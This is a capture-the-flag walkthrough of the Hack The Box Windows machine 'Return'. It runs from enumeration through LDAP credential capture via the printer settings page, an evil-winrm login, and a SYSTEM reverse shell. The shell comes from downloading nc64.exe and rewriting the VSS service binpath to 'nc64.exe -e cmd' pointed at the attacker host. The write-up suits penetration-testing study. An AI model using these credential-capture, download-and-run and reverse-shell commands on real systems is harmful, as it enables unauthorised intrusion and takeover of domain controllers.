Return

Windows:

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.108

53/tcp   open  domain        Simple DNS Plus

80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-18 01:00:22Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  tcpwrapped

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)

3269/tcp open  tcpwrapped

Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10|Vista|11|2012|2022|Longhorn|7|8.1|XP (93%)
OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows Server 2019 (93%), Microsoft Windows 10 2004 (90%), Microsoft Windows Vista SP1 (90%), Microsoft Windows 10 1709 - 1803 (89%), Microsoft Windows 10 1709 - 1909 (89%), Microsoft Windows 10 1809 - 2004 (89%), Microsoft Windows 11 21H2 (89%), Microsoft Windows 10 1703 (89%), Microsoft Windows Server 2012 (89%), Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-18T01:01:13
|_  start_date: N/A
|_clock-skew: 18m34s

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.108    

53/udp   open          domain
88/udp   open          kerberos-sec
123/udp  open          ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
389/udp  open          ldap
464/udp  open|filtered kpasswd5
500/udp  open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr

Enumeration: SMB Port 139/445/tcp

crackmapexec shows that the hostname os PRINTER.return.local, and I need auth to get any additional information from SMB:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.108

[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.108 -u null

[*] Detected 0 hosts serving SMB

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.11.108 -u '' -p '' --shares

SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\: 
SMB         10.10.11.108    445    PRINTER          [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.11.108 --shares
SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

Enumeration: MSRPC Port 135/tcp

┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.11.108 -U ""

Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.11.108

 ================================( Getting domain SID for 10.10.11.108 )================================
Domain Name: RETURN
Domain Sid: S-1-5-21-3750359090-2939318659-876128439
[+] Host is part of a domain (not a workgroup)

Enumeration: HTTP Port 80/tcp

The site is the “HTB Printer Admin Panel”: http://10.10.11.108/index.php

“Settings” leads to /settings.php, which presents a form: http://10.10.11.108/settings.php

The “Fax” and “Troubleshooting” links don’t go anywhere.

SOURCE CODE: view-source:http://10.10.11.108/index.php

BURP: Everything points to this site being written in PHP, including the page extensions and the response headers: http://10.10.11.108

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.4.13
Date: Thu, 18 Jan 2024 03:05:37 GMT
Connection: close
Content-Length: 28274

WIRESHARK: intercept and review packets

DIR BRUTE: I’ll run feroxbuster against the site, and include -x php since I know the site is PHP as well as a lowercase wordlist since IIS is case-insensitive:

┌──(kali💀kali)-[~]
└─$ feroxbuster -u http://10.10.11.108 -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt 

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.11.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/images               (Status: 301) [Size: 150] [--> http://10.10.11.108/images/]
/index.php            (Status: 200) [Size: 28274]
/Images               (Status: 301) [Size: 150] [--> http://10.10.11.108/Images/]
/Index.php            (Status: 200) [Size: 28274]
/settings.php         (Status: 200) [Size: 29090]
/IMAGES               (Status: 301) [Size: 150] [--> http://10.10.11.108/IMAGES/]
/INDEX.php            (Status: 200) [Size: 28274]

NIKTO:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.108

+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: PHP/7.4.13.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .

Shell as svc-printer

LDAP Credentials: My first thought on seeing the settings.php page is that it’s populating the “Password” field for me. This could be a case where the actual password is being populated into this field, and it’s just being displayed as *. But looking in Firefox dev tools, it’s actually pre-filling that field with all *, not the password

Request: When I submit this form, it sends a POST to /settings.php. The POST body only has one argument:

POST /settings.php HTTP/1.1
Host: 10.10.11.108
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.108
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.108/settings.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

ip=printer.return.local

The other three fields in the form are not even sent. If the page does anything with this input, the user can only change the host (or “ip”), and not the port, username, or password.

Watch Request: I’ll change the hostname to my tun0 IP, and start nc listening on port 389. I’ll also start Wireshark. On clicking “Update”, there’s a connection at nc:

┌──(kali💀kali)-[~]
└─$ nc -lnvp 389

connect to [10.10.16.4] from (UNKNOWN) [10.10.11.108] 59885
0*`%return\svc-printer 
                       1edFg43012!!

It’s probably clear from just that what the username and password that it’s trying to authenticate, but Wireshark breaks it out more nicely:

svc-printer
1edFg43012!!

It’s an LDAP bindRequest, with the username return\svc-printer and the simple authentication (password) of “1edFg43012!!”.

WinRM: The obvious next step is to look at LDAP, but before that, I’ll check and see if these creds happen to give more direct access. They work for SMB:

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.11.108 --shares -u svc-printer -p '1edFg43012!!'

SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 
SMB         10.10.11.108    445    PRINTER          [*] Enumerated shares
SMB         10.10.11.108    445    PRINTER          Share           Permissions     Remark
SMB         10.10.11.108    445    PRINTER          -----           -----------     ------
SMB         10.10.11.108    445    PRINTER          ADMIN$          READ            Remote Admin
SMB         10.10.11.108    445    PRINTER          C$              READ,WRITE      Default share
SMB         10.10.11.108    445    PRINTER          IPC$            READ            Remote IPC
SMB         10.10.11.108    445    PRINTER          NETLOGON        READ            Logon server share
SMB         10.10.11.108    445    PRINTER          SYSVOL          READ            Logon server share

Most interestingly, they also work for WinRM:

┌──(kali💀kali)-[~]
└─$ crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
SMB         10.10.11.108    5985   PRINTER          [*] Windows 10.0 Build 17763 (name:PRINTER) (domain:return.local)
HTTP        10.10.11.108    5985   PRINTER          [*] http://10.10.11.108:5985/wsman
HTTP        10.10.11.108    5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

I’ll use Evil-WinRM to connect and get a shell:

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentestingGitHub

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
b0818d1--------------------------

Shell as SYSTEM

Enumeration: This account has a few interesting privileges:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

There’s a bunch of stuff here that could lead to SYSTEM access. I’ve shown using SeBackupPrivilege to get arbitrary file read. SeMachineAccountPrivilege allows me to add a machine to the domain, and I could likely escalate there as well.

Groups: This user is also in several groups:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups

GROUP INFORMATION
-----------------
Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

There may be others of interest, but Server Operators jumps out immediately. This group can do a lot of things:

Windows Built-in Users, Default Groups and Special Identities - Windows CMD - SS64.comss64.com

A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. Default User Rights: Allow log on locally: SeInteractiveLogonRight Back up files and directories: SeBackupPrivilege Change the system time: SeSystemTimePrivilege Change the time zone: SeTimeZonePrivilege Force shutdown from a remote system: SeRemoteShutdownPrivilege Restore files and directories SeRestorePrivilege Shut down the system: SeShutdownPrivilege

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> netstat -ano | findstr TCP | findstr ":0"
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2592
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       496
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1124
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1448
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       1804
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49675          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       2556
  TCP    0.0.0.0:49679          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49719          0.0.0.0:0              LISTENING       2724
  TCP    0.0.0.0:60133          0.0.0.0:0              LISTENING       2684
  TCP    10.10.11.108:53        0.0.0.0:0              LISTENING       2724
  TCP    10.10.11.108:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2724
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:88                [::]:0                 LISTENING       644
  TCP    [::]:135               [::]:0                 LISTENING       908
  TCP    [::]:389               [::]:0                 LISTENING       644
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:464               [::]:0                 LISTENING       644
  TCP    [::]:593               [::]:0                 LISTENING       908
  TCP    [::]:636               [::]:0                 LISTENING       644
  TCP    [::]:3268              [::]:0                 LISTENING       644
  TCP    [::]:3269              [::]:0                 LISTENING       644
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:9389              [::]:0                 LISTENING       2592
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       496
  TCP    [::]:49665             [::]:0                 LISTENING       1124
  TCP    [::]:49666             [::]:0                 LISTENING       1448
  TCP    [::]:49668             [::]:0                 LISTENING       644
  TCP    [::]:49671             [::]:0                 LISTENING       1804
  TCP    [::]:49674             [::]:0                 LISTENING       644
  TCP    [::]:49675             [::]:0                 LISTENING       644
  TCP    [::]:49676             [::]:0                 LISTENING       2556
  TCP    [::]:49679             [::]:0                 LISTENING       628
  TCP    [::]:49719             [::]:0                 LISTENING       2724
  TCP    [::]:60133             [::]:0                 LISTENING       2684
  TCP    [::1]:53               [::]:0                 LISTENING       2724
  TCP    [dead:beef::a8]:53     [::]:0                 LISTENING       2724
  TCP    [dead:beef::c9ca:bc37:6bb5:c70d]:53  [::]:0                 LISTENING       2724
  TCP    [fe80::c9ca:bc37:6bb5:c70d%10]:53  [::]:0                 LISTENING       2724

Reverse Shell: This user can modify, start, and stop services, so I’ll abuse this by having it run nc64.exe to give a reverse shell. Cube0x0 has a nice post that includes many privesc techniques, including this one.

https://cube0x0.github.io/Pocing-Beyond-DA/cube0x0.github.io

I’ll upload nc64.exe to Return:

┌──(kali💀kali)-[~/Desktop/6. Web Shells]
└─$ python -m SimpleHTTPServer 5555

*Evil-WinRM* PS C:\Users\svc-printer\Downloads> powershell -c iex(new-object net.webclient).downloadfile('http://10.10.16.4:5555/nc64.exe', 'C:\Users\svc-printer\Downloads\nc64.exe')

Typically, I would want to get a list of services that this account can modify, but it seems this user doesn’t have access to the Service Control Manager:

sc.exe query

$services=(get-service).name | foreach {(Get-ServiceAcl $_)  | where {$_.access.IdentityReference -match 'Server Operators'}}

Going in a bit blind, I’ll try the one that Cube0x0 shows in the post:

*Evil-WinRM* PS C:\Users\svc-printer\Downloads> sc.exe config VSS binpath="C:\Users\svc-printer\Downloads\nc64.exe -e cmd 10.10.16.4 443"

[SC] ChangeServiceConfig SUCCESS

It works! I’ll try to stop the service, but it’s not started. Then I’ll start it:

*Evil-WinRM* PS C:\Users\svc-printer\Downloads> sc.exe stop VSS

[SC] ControlService FAILED 1062:
The service has not been started.

┌──(kali💀kali)-[~/Desktop/6. Web Shells]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.108] 53764
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\Desktop